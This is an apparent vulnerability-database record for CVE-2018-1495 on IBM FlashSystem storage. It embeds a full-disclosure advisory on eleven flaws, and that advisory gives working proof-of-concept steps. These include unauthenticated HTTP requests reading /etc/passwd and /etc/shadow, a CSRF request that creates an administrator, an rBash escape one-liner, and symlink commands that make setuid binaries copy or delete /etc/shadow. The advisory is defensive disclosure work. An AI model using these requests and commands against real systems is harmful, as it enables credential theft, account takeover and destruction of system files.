  "details": "IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148.",
  "id": "GHSA-j2pq-5cv8-53j8",
  "modified": "2022-05-13T01:33:11Z",
  "published": "2022-05-13T01:33:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1495"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
    },
    {
      "type": "WEB",
      "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012280"
    },
    {
      "type": "WEB",
      "url": "http://www.ibm.com/support/docview.wss?uid=ssg1S1012281"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

var-201805-0351

Vulnerability from variot

IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148. IBM FlashSystem V840 and V900 The product contains vulnerabilities related to authorization, permissions, and access control. Vendors have confirmed this vulnerability IBM X-Force ID: 141148 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. Both IBM FlashSystem V840 and V900 are all-flash enterprise-level storage solutions of IBM Corporation in the United States. The solution provides a full set of disaster recovery tools (including snapshot, clone and replication) to protect data security and use IBM Virtual Storage Center to realize virtualization configuration and performance management. Vulnerabilities in IBMs Flashsystems and Storwize Products

Introduction

Vulnerabilities were identified in the IBM Flashsystem 840, IBM Flashsystem 900 and IBM Storwize V7000. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that further vulnerabilities exist. It is strongly recommended that IBM Corporation undertakes a full whitebox security assessment of this application.

The version under test was indicated as: 1.6.2.2 build 18

Affected Software And Versions

IBM Flashsystem 900
IBM Flashsystem 840
IBM Storwize V7000

Affected versions are indicated directly within the reported issues.

CVE

The following CVEs were assigned to the issues described in this report: CVE-2018-1438 CVE-2018-1433 CVE-2018-1434 CVE-2018-1462 CVE-2018-1463 CVE-2018-1464 CVE-2018-1495 CVE-2018-1467 CVE-2018-1465 CVE-2018-1466 CVE-2018-1461

Vulnerability Overview

CVE-2018-1438: Unauthenticated arbitrary file read on V7000 Unified allowing storage data access
CVE-2018-1433: Unauthenticated arbitrary file read via the DownloadFile Handler / Authenticated arbitrary file read via the DownloadFile Handler on v7000 Unified
CVE-2018-1434: Web interface vulnerable to CSRF
CVE-2018-1462: rBash ineffective as a security measure
CVE-2018-1463: World readable credentials and encryption keys
CVE-2018-1464: Sensitive file disclosure of files readable by root
CVE-2018-1495: Arbitrary file overwrite
CVE-2018-1467: Unauthenticated information disclosure
CVE-2018-1465: Unprivileged web server process may read SSL private key
CVE-2018-1466: Weak password hashing algorithm used
CVE-2018-1461: Missing Security Related HTTP Headers

Vulnerability Details

CVE-2018-1438. Unauthenticated arbitrary file read on V7000 Unified allowing storage data access

On the IBM V7000 Unified System the web handler /DLSnap does not require authentication and allows to read arbitrary files from the system as "root", including the data stored in the storage system from the mounted shares.

GET /DLSnap?filename=/ibm//secret-file.txt HTTP/1.1 Host: v7ku01 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9

HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: Expires: Wed, 31 Dec 1969 16:00:00 PST X-Frame-Options: SAMEORIGIN Set-Cookie: SonasSessionID=; Path=/; Secure; HttpOnly Content-disposition: attachment; filename=secret-file.txt Pragma: Content-Type: application/octet-stream Date: Tue, 16 Jan 2018 11:12:39 GMT Connection: close Content-Length: 4

CVE-2018-1433. Unauthenticated file read via the DownloadFile Handler / Authenticated arbitrary file read via the DownloadFile Handler on v7000 Unified

In case of the following list of products, the DownloadFile handler allows unauthenticated file reading under the "webadmin" user: IBM Flashsystem 900 IBM Flashsystem 840 IBM Storwize V7000

Example request: GET /DownloadFile?filename=/etc/passwd HTTP/1.1 Host: v7k01n02 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9

On the V7000 Unified the same request handler allows reading arbitrary files under the "root" user, however authentication is required here: GET /DownloadFile?filename=/etc/shadow Host: v7ku01 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie:

CVE-2018-1434: Web interface vulnerable to CSRF

The main web interface on the V7000 Unified is vulnerable to CSRF and other interfaces seem to be vulnerable as well. This could allow an external attacker to execute commands on behalf of a user/administrator of the system and potentially also access data stored on the system.

Example request (using a cross domain XMLHttpRequest): POST /RPCAdapter HTTP/1.1 Host: v7ku01 Origin: https://www.example.com Referer: https://www.example.com/create_admin.html Content-Type: text/plain Connection: close Content-Length: 183 Cookie:

{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.sonas.gui.logic.AccessRPC","methodName":"launchCreateUserTask","methodArgs":["my-secadmin","",["Administrator"]]}

Response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Frame-Options: SAMEORIGIN Content-Type: application/json;charset=UTF-8 Content-Length: 319 Connection: close

{"clazz":"com.ibm.evo.rpc.RPCResponse","messages":null,"result":{"clazz":"com.ibm.sonas.gui.logic.tasks.access.CreateUserTask","shouldBeScheduled":true,"started":1516202190188,"id":"","name":"Create User", "state":"Running","status":"Task started.","progress":-1,"returnValue": null}}

CVE-2018-1462: Ineffective rBash Configuration

On machines with a restricted bash, a possible escape from rBash looks like the following: BASH_CMDS[escape]=/bin/bash;escape

CVE-2018-1463: World readable credentials and encryption keys

While some systems have removed the world-read bit from several files and directories, more important files which contain application configuration details, passwords and secret keys are world readable and sometimes also world writable. On the IBM Flash System, this also includes the storage encryption key.

Partial directory listing of /persist/ on the Unified system:

drwxr-xr-x. 2 root root 4096 Jan 18 01:35 . drwxr-xr-x. 29 root root 4096 Aug 15 16:16 .. -rw-r--r--. 1 root root 27040 Jan 16 08:28 vpd ...

Partial directory listing of /mnt/plfs on the Flash system:

drwxrwxrwx 4 root root 0 Dec 31 1969 . drwxr-x--x 7 root root 1024 Jan 8 07:41 .. -rw-rw-rw- 1 root root 24 Oct 24 2016 encryption.key

CVE-2018-1464: Sensitive file disclosure of files readable by root

The setuid binary svc_copy is a wrapper around the script sw_copy which calls cp on the shell.

Creating a symlink to any file, this file can be copied as root to /dumps and is world readable/writable (-rw-rw-rw- ):

$ ln -s /etc/shadow /tmp/shadow $ ./svc_copy /tmp/shadow /dumps/

The file /dumps/shadow is now world readable with the permissions (-rw-rw-rw- )

CVE-2018-1495: Arbitrary file deletion

The setuid binary log_cleanup is a wrapper around log_cleanup.py

This binary wipes the directories /dumps or /tmp and has an undocumented feature "-s" (delete target of symlink).

The following command deletes an arbitrary file (e.g. /etc/shadow): $ ln -s /etc/shadow /tmp/shadow $ ./log_cleanup -s Select /tmp as target directory to be wiped

CVE-2018-1467: Unauthenticated information disclosure

Some web handlers on the V7000 Unified expose system configuration without authentication which could be used by an attacker to collect vital details about the environment.

https://v7ku01/SonasInfoServlet?challenge=1 CLUSTER_ID=;NAME=.ibm;PROFILE=V7000 Unified;SYSTEM_NAME=.ibm;mgmt001st001=;mgmt002st001=;idMapConfig=10000000-299999999,1000000;adHost;krbMode=off;domain=;idMapRole=master;realm=;userName=;idMappingMethod=auto;passwordServer=*;AUTH_TYPE=ad;IDMAP_10000000-10999999=ALLOC,ALLOC,auto;IDMAP_11000000-11999999=BUILTIN,S-1-5-32,auto;IDMAP_12000000-12999999=,S-1-5-21-,auto;IDMAP_13000000-13999999=,S-1-5-21-,auto; CHALLENGE

CVE-2018-1465: Unprivileged web server process may read SSL private key

The current private key for the installed SSL certificate on the V7000 FC CE Cannister Node is readable by the webadmin user: -rw-r----- 1 webadmin 1000 1679 Aug 15 09:47 /dev/server.key

As a result the file can be read through vulnerabilities in the web application, e.g. via the DownloadFile handler (see separate issue).

Certificate details: Validity: 15 years Subject: C=GB, L=Hursley, O=IBM, OU=SSG, CN=2076, emailAddress=support@ibm.com

CVE-2018-1466: Weak password hashing algorithm used

The root password on the V7000 (CE) FC Cannister and Flash System nodes (and probably others, too) are hashed with a weak algorithm (DES) instead of the SHA512 which is the system's default according to /etc/login.defs.

CVE-2018-1461: Missing Security Related HTTP Headers

XSS Protection HTTP Header The XSS Filter is a feature that is built into modern web browsers and is meant to prevent reflective Cross Site Scripting attacks. This feature can be explicitly turned on (and also off) by using the HTTP header X-XSS-Protection.

X-Content-Type Header To make MIME type confusion attacks harder, the HTTP header X-Content-Type-Options can be set. This header prevents trusting the user provided MIME type and instead guessing the MIME type of the server response.

Author

The vulnerabilities were discovered by Sebastian Neuner (@sebastian9er) and Jan Bee from the Google Security Team.

Timeline

2018/01/26 - Security report sent to psirt@us.ibm.com with 90 day disclosure deadline (2018/04/26). 2018/01/29 - IBM acknowledges report and starts working on the issues. 2018/04/13 - IBM requested grace period due to internal patch cycle. 2018/04/16 - Google granted two week grace period (from 2018/04/26 to 2018/05/11). 2018/05/11 - Public disclosure on the Full Disclosure/Bugtraq Mailing List

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201805-0351",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "flashsystem 840",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "flashsystem 900",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "flashsystem v840",
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "flashsystem v900",
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-1495"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:ibm:flashsystem_840_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:ibm:flashsystem_900_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jan Bee, Sebastian Neuner",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "147601"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2018-1495",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.0,
            "id": "CVE-2018-1495",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.0,
            "id": "VHN-125160",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:N/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.8,
            "id": "CVE-2018-1495",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 2.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2018-1495",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "psirt@us.ibm.com",
            "id": "CVE-2018-1495",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2018-1495",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201805-971",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-125160",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125160"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-1495"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-1495"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148. IBM FlashSystem V840 and V900 The product contains vulnerabilities related to authorization, permissions, and access control. Vendors have confirmed this vulnerability IBM X-Force ID: 141148 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. Both IBM FlashSystem V840 and V900 are all-flash enterprise-level storage solutions of IBM Corporation in the United States. The solution provides a full set of disaster recovery tools (including snapshot, clone and replication) to protect data security and use IBM Virtual Storage Center to realize virtualization configuration and performance management. Vulnerabilities in IBMs Flashsystems and Storwize Products\n-------------------------------------------------------------------------\n\nIntroduction\n============\nVulnerabilities were identified in the IBM Flashsystem 840, IBM Flashsystem\n900 and IBM Storwize V7000. These were discovered during a black box\nassessment and therefore the vulnerability list should not be considered\nexhaustive; observations suggest that it is likely that further\nvulnerabilities exist. It is strongly recommended that IBM Corporation\nundertakes a full whitebox security assessment of this application. \n\nThe version under test was indicated as: 1.6.2.2 build 18\n\nAffected Software And Versions\n==============================\n- IBM Flashsystem 900\n- IBM Flashsystem 840\n- IBM Storwize V7000\n\nAffected versions are indicated directly within the reported issues. \n\nCVE\n===\nThe following CVEs were assigned to the issues described in this report:\nCVE-2018-1438\nCVE-2018-1433\nCVE-2018-1434\nCVE-2018-1462\nCVE-2018-1463\nCVE-2018-1464\nCVE-2018-1495\nCVE-2018-1467\nCVE-2018-1465\nCVE-2018-1466\nCVE-2018-1461\n\nVulnerability Overview\n======================\n   01. CVE-2018-1438: Unauthenticated arbitrary file read on V7000 Unified\nallowing storage data access\n   02. CVE-2018-1433: Unauthenticated arbitrary file read via the\nDownloadFile Handler / Authenticated arbitrary file read via the\nDownloadFile Handler on v7000 Unified\n   03. CVE-2018-1434: Web interface vulnerable to CSRF\n   04. CVE-2018-1462: rBash ineffective as a security measure\n   05. CVE-2018-1463: World readable credentials and encryption keys\n   06. CVE-2018-1464: Sensitive file disclosure of files readable by root\n   07. CVE-2018-1495: Arbitrary file overwrite\n   08. CVE-2018-1467: Unauthenticated information disclosure\n   09. CVE-2018-1465: Unprivileged web server process may read SSL private\nkey\n   10. CVE-2018-1466: Weak password hashing algorithm used\n   11. CVE-2018-1461: Missing Security Related HTTP Headers\n\n\nVulnerability Details\n=====================\n\n---------------------------------------------\nCVE-2018-1438. Unauthenticated arbitrary file read on V7000 Unified\nallowing storage data access\n---------------------------------------------\n\nOn the IBM V7000 Unified System the web handler /DLSnap does not require\nauthentication and allows to read arbitrary files from the system as\n\"root\", including the data stored in the storage system from the mounted\nshares. \n\nGET /DLSnap?filename=/ibm/\u003credacted\u003e/secret-file.txt HTTP/1.1\nHost: v7ku01\nConnection: close\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nCache-Control:\nExpires: Wed, 31 Dec 1969 16:00:00 PST\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: SonasSessionID=\u003credacted\u003e; Path=/; Secure; HttpOnly\nContent-disposition: attachment; filename=secret-file.txt\nPragma:\nContent-Type: application/octet-stream\nDate: Tue, 16 Jan 2018 11:12:39 GMT\nConnection: close\nContent-Length: 4\n\n42\n\n--------------------------------------------------\nCVE-2018-1433. Unauthenticated file read via the DownloadFile Handler /\nAuthenticated arbitrary file read via the DownloadFile Handler on v7000\nUnified\n--------------------------------------------------\n\n\nIn case of the following list of products, the DownloadFile handler allows\nunauthenticated file reading under the \"webadmin\" user:\nIBM Flashsystem 900\nIBM Flashsystem 840\nIBM Storwize V7000\n\nExample request:\nGET /DownloadFile?filename=/etc/passwd HTTP/1.1\nHost: v7k01n02\nConnection: close\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\nOn the V7000 Unified the same request handler allows reading arbitrary\nfiles under the \"root\" user, however authentication is required here:\nGET /DownloadFile?filename=/etc/shadow\nHost: v7ku01\nConnection: close\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: \u003credacted\u003e\n\n-----------------------------------------------\nCVE-2018-1434: Web interface vulnerable to CSRF\n-----------------------------------------------\n\nThe main web interface on the V7000 Unified is vulnerable to CSRF and other\ninterfaces seem to be vulnerable as well. This could allow an external\nattacker to execute commands on behalf of a user/administrator of the\nsystem and potentially also access data stored on the system. \n\nExample request (using a cross domain XMLHttpRequest):\nPOST /RPCAdapter HTTP/1.1\nHost: v7ku01\nOrigin: https://www.example.com\nReferer: https://www.example.com/create_admin.html\nContent-Type: text/plain\nConnection: close\nContent-Length: 183\nCookie: \u003credacted\u003e\n\n{\"clazz\":\"com.ibm.evo.rpc.RPCRequest\",\"methodClazz\":\"com.ibm.sonas.gui.logic.AccessRPC\",\"methodName\":\"launchCreateUserTask\",\"methodArgs\":[\"my-secadmin\",\"\u003credacted\u003e\",[\"Administrator\"]]}\n\n\nResponse:\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nX-Frame-Options: SAMEORIGIN\nContent-Type: application/json;charset=UTF-8\nContent-Length: 319\nConnection: close\n\n{\"clazz\":\"com.ibm.evo.rpc.RPCResponse\",\"messages\":null,\"result\":{\"clazz\":\"com.ibm.sonas.gui.logic.tasks.access.CreateUserTask\",\"shouldBeScheduled\":true,\"started\":1516202190188,\"id\":\"\u003credacted\u003e\",\"name\":\"Create\nUser\", \"state\":\"Running\",\"status\":\"Task\nstarted.\",\"progress\":-1,\"returnValue\": null}}\n\n---------------------------------------------\nCVE-2018-1462: Ineffective rBash Configuration\n---------------------------------------------\n\nOn machines with a restricted bash, a possible escape from rBash looks like\nthe following:\nBASH_CMDS[escape]=/bin/bash;escape\n\n--------------------------------------------------\nCVE-2018-1463: World readable credentials and encryption keys\n--------------------------------------------------\n\nWhile some systems have removed the world-read bit from several files and\ndirectories, more important files which contain application configuration\ndetails, passwords and secret keys are world readable and sometimes also\nworld writable. On the IBM Flash System, this also includes the storage\nencryption key. \n\n# Partial directory listing of /persist/ on the Unified system:\ndrwxr-xr-x.  2 root root   4096 Jan 18 01:35 . \ndrwxr-xr-x. 29 root root   4096 Aug 15 16:16 .. \n-rw-r--r--.  1 root root  27040 Jan 16 08:28 vpd\n... \n\n# Partial directory listing of /mnt/plfs on the Flash system:\ndrwxrwxrwx 4 root  root        0 Dec 31  1969 . \ndrwxr-x--x 7 root  root     1024 Jan  8 07:41 .. \n-rw-rw-rw- 1 root  root       24 Oct 24  2016 encryption.key\n\n-----------------------------------------------\nCVE-2018-1464: Sensitive file disclosure of files readable by root\n-----------------------------------------------\n\nThe setuid binary svc_copy is a wrapper around the script sw_copy which\ncalls cp on the shell. \n\nCreating a symlink to any file, this file can be copied as root to /dumps\nand is world readable/writable (-rw-rw-rw- ):\n\n$ ln -s /etc/shadow /tmp/shadow\n$ ./svc_copy /tmp/shadow /dumps/\n\nThe file /dumps/shadow is now world readable with the permissions\n(-rw-rw-rw- )\n\n---------------------------------------------\nCVE-2018-1495: Arbitrary file deletion\n---------------------------------------------\n\nThe setuid binary log_cleanup is a wrapper around log_cleanup.py\n\nThis binary wipes the directories /dumps or /tmp and has an undocumented\nfeature \"-s\" (delete target of symlink). \n\nThe following command deletes an arbitrary file (e.g. /etc/shadow):\n$ ln -s /etc/shadow /tmp/shadow\n$ ./log_cleanup -s\nSelect /tmp as target directory to be wiped\n\n--------------------------------------------------\nCVE-2018-1467: Unauthenticated information disclosure\n--------------------------------------------------\n\nSome web handlers on the V7000 Unified expose system configuration without\nauthentication which could be used by an attacker to collect vital details\nabout the environment. \n\nhttps://v7ku01/SonasInfoServlet?challenge=1\nCLUSTER_ID=\u003credacted\u003e;NAME=\u003credacted\u003e.ibm;PROFILE=V7000\nUnified;SYSTEM_NAME=\u003credacted\u003e.ibm;mgmt001st001=\u003credacted\u003e;mgmt002st001=\u003credacted\u003e;idMapConfig=10000000-299999999,1000000;adHost\u003credacted\u003e;krbMode=off;domain=\u003credacted\u003e;idMapRole=master;realm=\u003credacted\u003e;userName=\u003credacted\u003e;idMappingMethod=auto;passwordServer=*;AUTH_TYPE=ad;IDMAP_10000000-10999999=ALLOC,ALLOC,auto;IDMAP_11000000-11999999=BUILTIN,S-1-5-32,auto;IDMAP_12000000-12999999=\u003credacted\u003e,S-1-5-21-\u003credacted\u003e,auto;IDMAP_13000000-13999999=\u003credacted\u003e,S-1-5-21-\u003credacted\u003e,auto;\nCHALLENGE \u003credacted\u003e\n\n\n-----------------------------------------------\nCVE-2018-1465: Unprivileged web server process may read SSL private key\n-----------------------------------------------\n\nThe current private key for the installed SSL certificate on the V7000 FC\nCE Cannister Node is readable by the webadmin user:\n-rw-r----- 1 webadmin 1000 1679 Aug 15 09:47 /dev/server.key\n\nAs a result the file can be read through vulnerabilities in the web\napplication, e.g. via the DownloadFile handler (see separate issue). \n\nCertificate details:\nValidity: 15 years\nSubject: C=GB, L=Hursley, O=IBM, OU=SSG, CN=2076,\nemailAddress=support@ibm.com\n\n---------------------------------------------\nCVE-2018-1466: Weak password hashing algorithm used\n---------------------------------------------\n\nThe root password on the V7000 (CE) FC Cannister and Flash System nodes\n(and probably others, too) are hashed with a weak algorithm (DES) instead\nof the SHA512 which is the system\u0027s default according to /etc/login.defs. \n\n--------------------------------------------------\nCVE-2018-1461: Missing Security Related HTTP Headers\n--------------------------------------------------\n\nXSS Protection HTTP Header\nThe XSS Filter is a feature that is built into modern web browsers and is\nmeant to prevent reflective Cross Site Scripting attacks. This feature can\nbe explicitly turned on (and also off) by using the HTTP header\nX-XSS-Protection. \n\nX-Content-Type Header\nTo make MIME type confusion attacks harder, the HTTP header\nX-Content-Type-Options can be set. This header prevents trusting the user\nprovided MIME type and instead guessing the MIME type of the server\nresponse. \n\nAuthor\n======\nThe vulnerabilities were discovered by Sebastian Neuner (@sebastian9er) and\nJan Bee from the Google Security Team. \n\nTimeline\n========\n2018/01/26 - Security report sent to psirt@us.ibm.com with 90 day\ndisclosure deadline (2018/04/26). \n2018/01/29 - IBM acknowledges report and starts working on the issues. \n2018/04/13 - IBM requested grace period due to internal patch cycle. \n2018/04/16 - Google granted two week grace period (from 2018/04/26 to\n2018/05/11). \n2018/05/11 - Public disclosure on the Full Disclosure/Bugtraq Mailing List",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-1495"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "db": "VULHUB",
        "id": "VHN-125160"
      },
      {
        "db": "PACKETSTORM",
        "id": "147601"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-1495",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-971",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-125160",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147601",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125160"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "db": "PACKETSTORM",
        "id": "147601"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-1495"
      }
    ]
  },
  "id": "VAR-201805-0351",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-125160"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-11-23T19:40:53.011000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "S1012280",
        "trust": 0.8,
        "url": "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1012280"
      },
      {
        "title": "S1012281",
        "trust": 0.8,
        "url": "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1012281"
      },
      {
        "title": "ibm-flashsystem-cve20181495-dos (141148)",
        "trust": 0.8,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/141148"
      },
      {
        "title": "IBM FlashSystem V840  and V900 Product security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81162"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005792"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-971"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
